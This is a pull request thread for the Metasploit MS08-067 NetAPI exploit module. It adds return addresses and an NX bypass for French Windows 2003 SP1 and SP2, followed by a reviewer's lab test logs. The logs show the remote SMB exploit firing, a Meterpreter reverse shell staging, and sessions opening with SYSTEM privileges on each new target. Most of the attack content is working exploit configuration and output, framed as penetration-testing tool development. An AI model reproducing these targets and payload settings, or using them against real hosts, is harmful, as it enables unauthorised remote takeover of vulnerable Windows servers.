### PR TITLE
MS08-067 NetAPI Exploit - Added Windows 2003 SP1 & SP2 French targets

### PR DESCRIPTION
**Pull request by omarix**
```
msf exploit(ms08_067_netap) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   [...]
   61  Windows 2003 SP1 French (NO NX)
   62  Windows 2003 SP1 French (NX)

   [...]
   71  Windows 2003 SP2 French (NO NX)
   72  Windows 2003 SP2 French (NX)
```

### CODE REVIEW

**Comment by void-in** [comment]
@omarix There are empty lines at line 624 and line 721. These are causing the msftidy to fail. Please remove those and update this PR.

**Comment by omarix** [comment]
@void-in removed , thank you :)

File: modules/exploits/windows/smb/ms08_067_netapi.rb [hunk 1]
```diff
@@ -621,6 +621,26 @@ def initialize(info = {})
...
+          [ 'Windows 2003 SP1 French (NO NX)',
+            {
+              'Ret'       => 0x71ac1c40 ,
+              'Scratch'   => 0x00020408,
+            }
+          ], # JMP ESI WS2HELP.DLL
+
+          # Brett Moore's crafty NX bypass for 2003 SP1
+          # Added by Omar MEZRAG - 0xFFFFFF
+          [ 'Windows 2003 SP1 French (NX)',
```
Comment (jvazquez-r7) [inline modules/exploits/windows/smb/ms08_067_netapi.rb]: I've installed  Windows 2003 SP1 French machine

It's what I see on shell32.dll 6.0.3790.1830

* 7CA2568B

```
.text:7CA2568B                 jmp     loc_7CA219DE    ; jumptable 7CA22CE3 default case
```

* 0x7CB47CF4

```
.text:7CB47CF0                 mov     eax, 56000000h
.text:7CB47CF5
.text:7CB47CF5 loc_7CB47CF5:                           ; CODE XREF: sub_7CB47CE4+Aj
.text:7CB47CF5                 pop     ebp
.text:7CB47CF6                 retn    4
```

The netapi32.dll version installed is 5.2.3790.1830 so should be vulnerable I guess :)

**Comment by jvazquez-r7** [comment]
* Win 2003 SP1 French (NX)

```
msf exploit(ms08_067_netapi) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Attempting to trigger the vulnerability...
[*] Sending stage (884270 bytes) to 172.16.158.134
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.134:1029) at 2015-06-19 16:34:01 -0500

meterpreter > sysinfo
Computer        : JUAN-KK0YNUPF8K
OS              : Windows .NET Server (Build 3790, Service Pack 1).
Architecture    : x86
System Language : fr_FR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > exit
```

**Comment by jvazquez-r7** [comment]
* Win 2003 SP1 French (No NX)

```
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    172.16.158.134   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: , , seh, thread, process, none)
   LHOST     172.16.158.1     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   61  Windows 2003 SP1 French (NO NX)


msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Attempting to trigger the vulnerability...
[*] Sending stage (884270 bytes) to 172.16.158.134
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.134:1029) at 2015-06-19 16:39:42 -0500

meterpreter > getuid
Server username: AUTORITE NT\SYSTEM
smeterpreter > sysinfo
Computer        : JUAN-KK0YNUPF8K
OS              : Windows .NET Server (Build 3790, Service Pack 1).
Architecture    : x86
System Language : fr_FR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >
```

**Comment by jvazquez-r7** [comment]
Win 2003 SP2 French (NX):

```
msf exploit(ms08_067_netapi) > set target 72
target => 72
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    172.16.158.134   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: , , seh, thread, process, none)
   LHOST     172.16.158.1     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   72  Windows 2003 SP2 French (NX)


msf exploit(ms08_067_netapi) > set rhost 172.16.158.135
rhost => 172.16.158.135
msf exploit(ms08_067_netapi) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Attempting to trigger the vulnerability...
[*] Sending stage (884270 bytes) to 172.16.158.135
[*] Meterpreter session 3 opened (172.16.158.1:4444 -> 172.16.158.135:1030) at 2015-06-19 16:52:51 -0500

meterpreter > getuid
syServer username: AUTORITE NT\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C1B8084257
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : fr_FR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >
```

**Comment by jvazquez-r7** [comment]
* Windows 2003 SP2 (NO NX)
```
msf exploit(ms08_067_netapi) > set target 71
target => 71
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    172.16.158.135   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: , , seh, thread, process, none)
   LHOST     172.16.158.1     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   71  Windows 2003 SP2 French (NO NX)

msf exploit(ms08_067_netapi) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Attempting to trigger the vulnerability...
[*] Sending stage (884270 bytes) to 172.16.158.135
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.135:1029) at 2015-06-19 16:56:28 -0500

meterpreter > getuid
meterpreter > sysinfo
Computer        : JUAN-C1B8084257
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : fr_FR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >
```

Thanks @omarix , landing!

**Pull request merged**